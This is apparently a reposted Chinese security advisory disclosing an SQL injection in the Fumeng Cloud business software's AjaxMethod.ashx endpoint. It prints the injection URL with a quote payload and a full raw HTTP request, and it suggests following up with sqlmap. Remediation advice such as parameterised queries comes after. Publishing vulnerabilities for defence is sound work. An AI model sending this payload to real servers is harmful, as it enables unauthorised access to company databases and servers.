孚盟云 SQL注入漏洞

admin 2023年6月12日09:00:58评论78 views字数 1010阅读3分22秒阅读模式

漏洞说明

孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品,让用户可以用云模式实现信息化管理,让用户的异地办公更加流畅,大大降低中小企业在信息化上成本,用最小的投入享受大型企业级别的信息化服务,使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。

孚盟云 AjaxMethod.ashx文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器权限

影响版本

孚盟云

漏洞复现

孚盟云 SQL注入漏洞

payload:

/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=1%27
GET /Ajax/AjaxMethod.ashx?action=getEmpByname&Name=1%27 HTTP/1.1Host: ip:portUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

孚盟云 SQL注入漏洞

SQL语句已经很清晰了,另外还报错显示了安装路径,直接SQLmap一梭子孚盟云 SQL注入漏洞

修复建议

  1. 特殊字符过滤:比如',",,<,>,&,*,;,#,select,from,where,sub,if,union,sleep,and,or 等

  2. 验证所有的输入点,包括 UA、Cookie 以及其他 HTTP 头;

  3. 预编译处理 & 参数化查询所有与数据库交互的业务接口均采用参数化查询,参数化的语句使用参数而不是将用户输入变量嵌入到 SQL 语句中,参数化查询是防御 SQL 注入的最佳方法,比如:Java 中的 PreparedStatement,PHP 中的 PDO 等。

本文章仅用于学习交流,不得用于非法用途

星标加关注,追洞不迷路

原文始发于微信公众号(才疏学浅的H6):孚盟云 SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月12日09:00:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   孚盟云 SQL注入漏洞https://cn-sec.com/archives/1798374.html

发表评论

匿名网友 填写信息